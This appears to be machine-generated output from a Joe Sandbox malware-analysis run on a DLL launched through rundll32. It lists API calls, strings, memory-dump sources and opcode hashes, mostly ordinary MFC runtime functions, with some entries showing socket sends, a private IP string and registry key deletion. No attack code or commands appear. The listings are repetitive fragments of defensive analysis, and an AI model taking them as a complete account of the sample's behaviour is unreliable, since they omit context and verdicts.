                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                    • API String ID: 2102423945-4122032997
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                    • String ID: System
                                                                                                                                    • API String ID: 1529587224-3470857405
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                    • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                    • API String ID: 2418878492-2500072749
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                    • _memset.LIBCMT ref: 1001579D
                                                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                    • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4271682439-3916222277
                                                                                                                                    • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                    • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                                    • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                                    • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                    • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                    • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2429671754-3916222277
                                                                                                                                    • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                    • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                                    • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                                    • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                                    • String ID: B$DISPLAY
                                                                                                                                    • API String ID: 3136151823-3316187204
                                                                                                                                    • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                    • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                                    • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                                    • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Edit
                                                                                                                                    • API String ID: 0-554135844
                                                                                                                                    • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                    • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                                    • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                    • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                    • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                    • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                    • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                    • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 187318432-0
                                                                                                                                    • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                    • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                                    • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                    • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 69039007-0
                                                                                                                                    • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                    • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                                    • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                    • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 696222070-0
                                                                                                                                    • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                    • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                                    • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                    • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 696222070-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                    • _memset.LIBCMT ref: 10020424
                                                                                                                                    • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                    • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 289641511-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                      • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                      • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                      • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                      • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                    • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                      • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                    • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2731880238-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                    • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                      • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongMenuWindow$AppendSystem
                                                                                                                                    • String ID: 192.168.3.85$Message
                                                                                                                                    • API String ID: 4121476972-856608562
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    • _strcat.LIBCMT ref: 1001310A
                                                                                                                                      • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                    • String ID: :
                                                                                                                                    • API String ID: 16450322-3653984579
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                      • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                      • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                      • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                    • API String ID: 3274081130-63838506
                                                                                                                                    • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                    • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                    • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
